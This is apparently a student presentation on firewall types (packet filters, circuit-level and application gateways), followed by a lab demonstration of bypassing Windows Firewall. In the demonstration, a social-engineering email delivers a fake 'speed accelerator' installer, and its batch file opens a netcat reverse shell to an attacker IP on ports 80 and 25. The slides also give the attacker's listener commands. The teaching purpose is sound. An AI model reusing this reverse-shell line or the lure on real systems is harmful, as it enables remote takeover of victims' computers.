460 likes | 578 Views
Firewall: Purpose, Types and Way of action . מנחה: ד"ר יצחק אביב מגיש: אורי ווידר ת.ז : 036851004. Introduction. Most organizations today have an internal network that interconnects their computer systems. There is usually a high degree of trust between
E N D
Firewall: Purpose, Types and Way of action מנחה: ד"ר יצחק אביב מגיש: אורי ווידר ת.ז : 036851004
Introduction Most organizations today have an internal network that interconnects their computer systems. There is usually a high degree of trust between the computer systems in the network, particularly if the network is private. However, many organizations now see the benefits of connecting to the Internet. But, the Internet is inherently an insecure network
So how can an organization or a private person securely connect to the Internet? Answer : The most secure and effective solution is to use a firewall
What is a firewall ? A firewall is a secure Internet gateway, which is used to interconnect a private network to the Internet in a manner in which all incoming and outgoing packets have to pass through it, and it decides whether to accept or discard them
There are a number of components that make up a firewall 1. The Internet access security policy of the organization. This states, at a high level, what degree of security the organization expects when connecting to the Internet. The security policy is independent of technology and techniques, and should have a lifetime independent of the equipment used.
2. The mapping of the security policy onto technical designs and procedures, that are to Be followed when connecting to the Internet. This information will be updated as new technology is announced, and as system Configurations change. Technical designs are usually based on one of two security policies, either: Deny any service unless it is expressly permitted or, permit any service unless it is expressly denied. The former is clearly the more secure of the two.
3. The firewall system, which is the hardware and software which implements the firewall. Typical firewall systems comprise of an IP packet filtering router, and a host computer (sometimes called a bastion host or application gateway) running application filtering and authentication software. Each of these firewall components is essential. A firewall system without an Internet access security policy cannot be correctly configured. A policy without enforced procedures is worthless as it is ignored.
a Microsoft ISA firewall (used in large organizations) rules list
Packet filters Packet filters work by dropping packets based on their source or destination addresses or port numbers. Little or no context is kept; decisions are made based solely on the contents of the current packet. Depending on the type of router, filtering may be done at the incoming interface, the outgoing interface or both. The administrator makes a list of the acceptable machines and services with a stop list of unacceptable machines or services. It is easy to permit or deny access at the host or network level with a packet filter. For example, one can permit any lP access between host A and B, or deny any access to B from any machine but A. Packet filters work well for blocking spoofed packets, either incoming or outgoing.
Packet filter rule set example This example fits the firewall philosophy :all that is not expressly permitted is prohibited.
Circuit-Level Gateways Circuit-level gateways work at the TCP level. TCP connections are relayed through a computer that essentially acts as a wire. The relay computer runs a program that copies bytes between two connections, while perhaps logging or caching the contents. In this scheme, when a client wishes to connect to a server, it connects to a relay host and possibly supplies connection information through a simple protocol. The relay host, in turn, connects to the server. The name and IP address of the client is usually not available to the Server, thereby not reveling useful information used by hackers. The other side of the relay host emits normal, well-behaved TCP/IP packets. A major advantage to using this method is that non-requested data from outside the firewall is not allowed in, period!
Application-Level Filtering A packet filter doesn't need to understand much about the traffic it is limiting. It looks at the source and destination addresses, and may peek into the UDP or TCP port numbers and flags. Application-level filters deal with the details of the particular service they are checking, and are usually more complex than packet filters. Rather than using a general-purpose mechanism to allow many different kinds of traffic to flow, special-purpose code can be used for each desired Application.
For example, an application-level filter for mail, will understand RFC 822 headers (a standard that specifies a syntax for text messages that are sent among computer users, within the framework of "electronic mail"), MIME- formatted attachments, and may well be able to identify virus-infected software. These filters usually are store-and-forward. Application gateways have another advantage that in some environments is quite critical: It is easy to log and control all incoming and outgoing traffic. Mail can be checked for "dirty words", Indications that proprietary or restricted data is passing the gateway. Web queries can be checked for conformance with company policies, and dangerous mail attachments can be stripped off.
Hacking a computer, while bypassing a firewall scenario In order to perform my malicious act, I have used a few of the following tools on which I will expand about later in this passage: Netcat tool- A utility that is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it essential that you understand the capabilities of Netcat. Netcat can be used as port scanner, a backdoor, a port redirector, a port listener and lots of other network administration tools.
Social engineering- Social engineering attacks take place on two levels: the physical and the psychological. The purpose of this attack is to basically convince the person being attacked, that it is in his best interest to oblige the attacker's request or action. A netcat script file - a script written in order to get the "attacked computer" to establish a connection with the attacking computer while bypassing the firewall in order to perform the hack.
In this scenario the windows firewall is turned on meaning that the all ports are closed! The purpose of this hack is to see all the unsuspecting users' tasks, and close one of them down.
First step Using social engineering, we have convinced this innocent person, that he has been given the opportunity to try a new software that will benefit his internet traffic, when in fact he will be the one responsible for creating a security breach in his system by downloading this malicious software that will infect it with the netcat tool and the script file.
E-mail contaning the address of the site hosting the “software accelerator” Speed up software unsuspectinguser@gmail.com
After downloading the "software" file, called accelerator soft.exe, the user is then instructed to open it and follow the setup wizard instructions. When the user is performing the installation process he is extracting two files into a library at c:\ps: 1.netcat.exe- the netcat tool 2. speed.bat- the netcat script file
When the wizard process is finished it will run the speed.bat script file, which contains the following line: c:\ps\netcat.exe 172.20.71.106 80 | cmd.exe | c:\ps\netcat.exe 172.20.71.106 25 The red highlighted portion- means that the netcat utility is opening a port 80, to the attacking computer, in order to receive the commands it. The green highlighted portion-the command interpreter will be used by the attacking computer in order to send commands to the attacked computer. The grey highlighted portion – means that the netcat utility is opening a port 25, to the attacking computer in order to send him the output of the attacked computer.
This script using the netcat tool opens a tcp connection to the attacking computer, whose Ip address is 172.20.71.106 on two ports: 80 and 25. Because both ports are well known ports for common use, where 80 is a http port and 25 is a SMTP port, they will not be blocked by the windows firewall, and all data passing throw them will be allowed.
Next step we will go over what happens on the attacker's side: The hacker is going to open two command prompt windows, one listening (waiting) for a connection on port 80 and the other listening (waiting) for a connection on port 25. In the first window the hacker will type the following line: Netcat –vv –l –p 80
Netcat –vv –l –p 80 Lets break do this script: -vv means that we are going into ultra verbose mode, meaning that every data that goes throw in this connection will be displayed on the command prompt window. -l -p 80 means that the hacker has created a TCP port, listening for a connection from another computer on port 80.
In the second window the hacker will type the following line: Netcat –vv –l –p 25 This line has the same functionality as the first one, with the exception that the port awaiting a connection is port 25. If the hacker is situated behind a router in a LAN he will half to create a port forwarding roles in his router firewall in order for the packets reaching his router from port 80 and 25 will be redirected to his station.
Once opening the two windows the hacker only has to wait for the "speed" script on the batch file to be activated in order for the connection between two computers will be established. After establishing a connection between the two computers the hacker will use a dos command- taskklist, this command will give the attacker, the entire attacked computer task list
After doing so the hacker will chose any one of the active task he would like to terminate using the dos command-taskkill /F /IM [process identification number]. Mission accomplished! The process representing a program has been closed down and the hacker has been informed that the process has been successfully terminated.
Analysis of the hack In this analysis I have performed the hack between two computers: The attacking computer whose IP address is 172.20.71.106 and the attacked computer whose IP address is 172.20.71.109. First we will see the TCP 3 way handshake between the two computers. This connection as mention earlier was initiated by the attacked computer.
The source code of netcat used to perform the hack(written in vc++ 6)
Next there are the sockets that have been opened on ports 25,80 The attacked side packets used to establish the connection : The attacking side sends a confirmation for the establishment request :
Afterwards the attacked computer sends information about his operating system:
Now after the connection is set, the hacker can get the attacked computers task list on port 80,(the port in which commands are sent) in order to select the process he wants to kill: The attacked computer task list request
The attacked computer responds and sends the computers entire task list: • After receiving the task list the hacker can now choose to shutdown • what ever task he wishes, using the taskklist command that was referred to earlier.
In Conclusion • The firewall provides a feeling of increased security that your organization’s or personal computer’s and contents are being protected. • There are a few types of firewalls, and combining them all into one product will insure maximum protection • There are some firewalls not up to task of providing full protection; therefore the constant search for newer and better firewalls would be in everyone's best interest